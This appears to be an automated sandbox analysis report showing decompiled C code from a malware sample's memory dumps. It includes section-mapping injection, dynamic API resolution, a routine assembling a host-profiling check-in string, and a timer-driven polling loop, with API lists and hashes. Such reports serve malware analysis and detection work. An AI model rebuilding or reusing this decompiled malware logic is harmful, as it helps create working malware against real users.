                                                                                                                                                                                                                                0x00a617ba
                                                                                                                                                                                                                                0x00a617c5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a617c5
                                                                                                                                                                                                                                0x00a617bc
                                                                                                                                                                                                                                0x00a617bc
                                                                                                                                                                                                                                0x00a617c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a617c2
                                                                                                                                                                                                                                0x00a616f0
                                                                                                                                                                                                                                0x00a617c6
                                                                                                                                                                                                                                0x00a617cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A616FB
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00A6176D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2574300362-0
                                                                                                                                                                                                                                • Opcode ID: 2b7d1411e077f7b09cac6e034141547e8bb3976ba87b7e58bfc2688e318f53b2
                                                                                                                                                                                                                                • Instruction ID: 48de0b04a0f7c067d79c74ef0f869070fade961beafa59e5ca0f8d3d05970614
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b7d1411e077f7b09cac6e034141547e8bb3976ba87b7e58bfc2688e318f53b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF312675A01206DFCB14CF99D890ABDBBF9FF08351B284569D801EB250E770EA41DF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A6138A(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                				if(_t13 < 0) {
                                                                                                                                                                                                                                					_push(_t13);
                                                                                                                                                                                                                                					return __esi[6]();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A61354,00000002,00000000,?,?,00000000,?,?,00A61354,00000002), ref: 00A613B7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: SectionView
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1323581903-0
                                                                                                                                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction ID: a8d977cc27206fa963a2505c34af67db9426e0b3e47b52de14d2e0f4ab93caee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF01CB690020CBFEB119FA5CC85CAFBBFDEB44394B104939B152E5190D6309E099A60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E00A9A565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _v4;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				intOrPtr* _t56;
                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				int _t77;
                                                                                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                                                                                				int _t81;
                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                				int _t86;
                                                                                                                                                                                                                                				intOrPtr* _t89;
                                                                                                                                                                                                                                				intOrPtr* _t90;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                                                				void* _t97;
                                                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				void* _t105;
                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t95 = __edx;
                                                                                                                                                                                                                                				_t91 = __ecx;
                                                                                                                                                                                                                                				_t25 = __eax;
                                                                                                                                                                                                                                				_t105 = _a16;
                                                                                                                                                                                                                                				_v4 = 8;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t25 = GetTickCount();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t26 =  *0xa9d018; // 0x9ad51634
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t27 =  *0xa9d014; // 0x3a87c8cd
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t28 =  *0xa9d010; // 0xd8d2f808
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t29 =  *0xa9d00c; // 0x13d015ef
                                                                                                                                                                                                                                				asm("bswap eax");
                                                                                                                                                                                                                                				_t30 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t3 = _t30 + 0xa9e633; // 0x74666f73
                                                                                                                                                                                                                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0xa9d02c,  *0xa9d004, _t25);
                                                                                                                                                                                                                                				_t33 = E00A95C12();
                                                                                                                                                                                                                                				_t34 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t4 = _t34 + 0xa9e673; // 0x74707526
                                                                                                                                                                                                                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                                                                                                                				_t108 = _t106 + 0x38;
                                                                                                                                                                                                                                				_t102 = _t101 + _t37; // executed
                                                                                                                                                                                                                                				_t38 = E00A9508C(_t91); // executed
                                                                                                                                                                                                                                				_t96 = _t38;
                                                                                                                                                                                                                                				if(_t96 != 0) {
                                                                                                                                                                                                                                					_t83 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t6 = _t83 + 0xa9e8cc; // 0x736e6426
                                                                                                                                                                                                                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t86;
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _t96);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t97 = E00A96706();
                                                                                                                                                                                                                                				if(_t97 != 0) {
                                                                                                                                                                                                                                					_t78 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t8 = _t78 + 0xa9e8d4; // 0x6f687726
                                                                                                                                                                                                                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t81;
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _t97);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t98 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				_a32 = E00A96DFA(0xa9d00a, _t98 + 4);
                                                                                                                                                                                                                                				_t42 =  *0xa9d308; // 0x0
                                                                                                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                                                                                                					_t74 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t11 = _t74 + 0xa9e8ae; // 0x3d736f26
                                                                                                                                                                                                                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                                                                                                                					_t108 = _t108 + 0xc;
                                                                                                                                                                                                                                					_t102 = _t102 + _t77;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t43 =  *0xa9d304; // 0x0
                                                                                                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                                                                                                					_t71 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t13 = _t71 + 0xa9e885; // 0x3d706926
                                                                                                                                                                                                                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_a32 != 0) {
                                                                                                                                                                                                                                					_t46 = RtlAllocateHeap( *0xa9d270, 0, 0x800); // executed
                                                                                                                                                                                                                                					_t100 = _t46;
                                                                                                                                                                                                                                					if(_t100 != 0) {
                                                                                                                                                                                                                                						E00A9A425(GetTickCount());
                                                                                                                                                                                                                                						_t50 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                						__imp__(_t50 + 0x40);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						_t54 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                						__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                						_t56 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                						_t103 = E00A922AB(1, _t95, _t105,  *_t56);
                                                                                                                                                                                                                                						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                						if(_t103 != 0) {
                                                                                                                                                                                                                                							StrTrimA(_t103, 0xa9c2ac);
                                                                                                                                                                                                                                							_push(_t103);
                                                                                                                                                                                                                                							_t62 = E00A92629();
                                                                                                                                                                                                                                							_v16 = _t62;
                                                                                                                                                                                                                                							if(_t62 != 0) {
                                                                                                                                                                                                                                								_t89 = __imp__;
                                                                                                                                                                                                                                								 *_t89(_t103, _v0);
                                                                                                                                                                                                                                								 *_t89(_t100, _a4);
                                                                                                                                                                                                                                								_t90 = __imp__;
                                                                                                                                                                                                                                								 *_t90(_t100, _v28);
                                                                                                                                                                                                                                								 *_t90(_t100, _t103);
                                                                                                                                                                                                                                								_t68 = E00A92168(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                                                                                                                								_v52 = _t68;
                                                                                                                                                                                                                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                                                                                                                									E00A9651D();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								HeapFree( *0xa9d270, 0, _v44);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							RtlFreeHeap( *0xa9d270, 0, _t103); // executed
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						RtlFreeHeap( *0xa9d270, 0, _t100); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _a24);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				RtlFreeHeap( *0xa9d270, 0, _t105); // executed
                                                                                                                                                                                                                                				return _a4;
                                                                                                                                                                                                                                			}


















































                                                                                                                                                                                                                                0x00a9a5f6
                                                                                                                                                                                                                                0x00a9a5f8
                                                                                                                                                                                                                                0x00a9a5fd
                                                                                                                                                                                                                                0x00a9a609
                                                                                                                                                                                                                                0x00a9a60b
                                                                                                                                                                                                                                0x00a9a617
                                                                                                                                                                                                                                0x00a9a619
                                                                                                                                                                                                                                0x00a9a619
                                                                                                                                                                                                                                0x00a9a624
                                                                                                                                                                                                                                0x00a9a628
                                                                                                                                                                                                                                0x00a9a62a
                                                                                                                                                                                                                                0x00a9a62f
                                                                                                                                                                                                                                0x00a9a63b
                                                                                                                                                                                                                                0x00a9a63d
                                                                                                                                                                                                                                0x00a9a649
                                                                                                                                                                                                                                0x00a9a64b
                                                                                                                                                                                                                                0x00a9a64b
                                                                                                                                                                                                                                0x00a9a651
                                                                                                                                                                                                                                0x00a9a664
                                                                                                                                                                                                                                0x00a9a668
                                                                                                                                                                                                                                0x00a9a66f
                                                                                                                                                                                                                                0x00a9a672
                                                                                                                                                                                                                                0x00a9a677
                                                                                                                                                                                                                                0x00a9a682
                                                                                                                                                                                                                                0x00a9a684
                                                                                                                                                                                                                                0x00a9a687
                                                                                                                                                                                                                                0x00a9a687
                                                                                                                                                                                                                                0x00a9a689
                                                                                                                                                                                                                                0x00a9a690
                                                                                                                                                                                                                                0x00a9a693
                                                                                                                                                                                                                                0x00a9a698
                                                                                                                                                                                                                                0x00a9a6a2
                                                                                                                                                                                                                                0x00a9a6a4
                                                                                                                                                                                                                                0x00a9a6ac
                                                                                                                                                                                                                                0x00a9a6bf
                                                                                                                                                                                                                                0x00a9a6c5
                                                                                                                                                                                                                                0x00a9a6c9
                                                                                                                                                                                                                                0x00a9a6d5
                                                                                                                                                                                                                                0x00a9a6da
                                                                                                                                                                                                                                0x00a9a6e3
                                                                                                                                                                                                                                0x00a9a6f4
                                                                                                                                                                                                                                0x00a9a6f8
                                                                                                                                                                                                                                0x00a9a701
                                                                                                                                                                                                                                0x00a9a707
                                                                                                                                                                                                                                0x00a9a714
                                                                                                                                                                                                                                0x00a9a721
                                                                                                                                                                                                                                0x00a9a727
                                                                                                                                                                                                                                0x00a9a733
                                                                                                                                                                                                                                0x00a9a739
                                                                                                                                                                                                                                0x00a9a73a
                                                                                                                                                                                                                                0x00a9a73f
                                                                                                                                                                                                                                0x00a9a745
                                                                                                                                                                                                                                0x00a9a74b
                                                                                                                                                                                                                                0x00a9a752
                                                                                                                                                                                                                                0x00a9a759
                                                                                                                                                                                                                                0x00a9a75f
                                                                                                                                                                                                                                0x00a9a766
                                                                                                                                                                                                                                0x00a9a76a
                                                                                                                                                                                                                                0x00a9a775
                                                                                                                                                                                                                                0x00a9a77a
                                                                                                                                                                                                                                0x00a9a780
                                                                                                                                                                                                                                0x00a9a789
                                                                                                                                                                                                                                0x00a9a789
                                                                                                                                                                                                                                0x00a9a79a
                                                                                                                                                                                                                                0x00a9a79a
                                                                                                                                                                                                                                0x00a9a7a9
                                                                                                                                                                                                                                0x00a9a7a9
                                                                                                                                                                                                                                0x00a9a7b8
                                                                                                                                                                                                                                0x00a9a7b8
                                                                                                                                                                                                                                0x00a9a7ca
                                                                                                                                                                                                                                0x00a9a7ca
                                                                                                                                                                                                                                0x00a9a7d9
                                                                                                                                                                                                                                0x00a9a7ea

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A9A57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A9A6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A9A6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A9A6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A9A6E3
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A9A701
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: strcpy.NTDLL ref: 00A922F5
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrcat.KERNEL32(00000000,?), ref: 00A92300
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A9C2AC,?,04FD95B0), ref: 00A9A733
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(?), ref: 00A92641
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcat.KERNEL32(00000000,?), ref: 00A92660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A9A752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A9A759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A9A766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00A9A76A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A9A79A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00A9A7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04FD95B0), ref: 00A9A7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00A9A7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 37201227350805d0aced91c3b206d5744b58fbc69ae9bcb59db0d226bfd28792
                                                                                                                                                                                                                                • Instruction ID: 868b6349b5e21420e1576e064171fce099ecf63f50fe72632fde42dfbbce53a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37201227350805d0aced91c3b206d5744b58fbc69ae9bcb59db0d226bfd28792
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A616A71700600AFDB21DBE8EE89E5637E8EB48350F040416FA09D7261DF25E947DBA6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A99FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				struct %anon52 _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				struct %anon52 _t46;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				long _t53;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				struct %anon52 _t60;
                                                                                                                                                                                                                                				long _t64;
                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                				void** _t78;
                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t73 = __edx;
                                                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                                                				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                				_v44 = _t46;
                                                                                                                                                                                                                                				if(_t46 == 0) {
                                                                                                                                                                                                                                					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0xffffffff);
                                                                                                                                                                                                                                					_push(0xff676980);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push( *0xa9d278);
                                                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					L00A9AEC0();
                                                                                                                                                                                                                                					_v36.LowPart = _t46;
                                                                                                                                                                                                                                					_v32 = _t73;
                                                                                                                                                                                                                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                					_t51 =  *0xa9d2a4; // 0x2e0
                                                                                                                                                                                                                                					_v40 = _t51;
                                                                                                                                                                                                                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                					_v8.LowPart = _t53;
                                                                                                                                                                                                                                					if(_t53 == 0) {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							 *0xa9d284 = 5;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t68 = E00A92932(_t73); // executed
                                                                                                                                                                                                                                							if(_t68 != 0) {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						if(_v12 == 1 && ( *0xa9d298 & 0x00000001) == 0) {
                                                                                                                                                                                                                                							_v12 = 2;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t71 = _v12;
                                                                                                                                                                                                                                						_t58 = _t71 << 4;
                                                                                                                                                                                                                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                						_t72 = _t71 + 1;
                                                                                                                                                                                                                                						_v24 = _t71 + 1;
                                                                                                                                                                                                                                						_t60 = E00A9462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                                                                                                                                						_v8.LowPart = _t60;
                                                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                                                							goto L17;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t65 = _v24;
                                                                                                                                                                                                                                						_v12 = _t65;
                                                                                                                                                                                                                                						_t90 = _t65 - 3;
                                                                                                                                                                                                                                						if(_t65 != 3) {
                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8.LowPart = E00A9516C(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                							_push(0xffffffff);
                                                                                                                                                                                                                                							_push(0xff676980);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *0xa9d27c);
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags =  *0xa9d280; // 0x0
                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t60 = E00A9651D();
                                                                                                                                                                                                                                								_push(0xffffffff);
                                                                                                                                                                                                                                								_push(0xdc3cba00);
                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                								_push( *0xa9d280);
                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                								L00A9AEC0();
                                                                                                                                                                                                                                								_v36.LowPart = _t60;
                                                                                                                                                                                                                                								_v32 = _t76;
                                                                                                                                                                                                                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                								_v8.LowPart = _t64;
                                                                                                                                                                                                                                								__eflags = _t64;
                                                                                                                                                                                                                                								if(_t64 == 0) {
                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L25:
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t78 =  &_v92;
                                                                                                                                                                                                                                					_t70 = 3;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t54 =  *_t78;
                                                                                                                                                                                                                                						if(_t54 != 0) {
                                                                                                                                                                                                                                							HeapFree( *0xa9d270, 0, _t54);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                						_t70 = _t70 - 1;
                                                                                                                                                                                                                                					} while (_t70 != 0);
                                                                                                                                                                                                                                					CloseHandle(_v44);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                				goto L25;
                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A9A007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A9A013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A9A038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00A9A054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A9A06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A9A103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A9A112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A9A14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A958BD,?), ref: 00A9A162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A9A16D
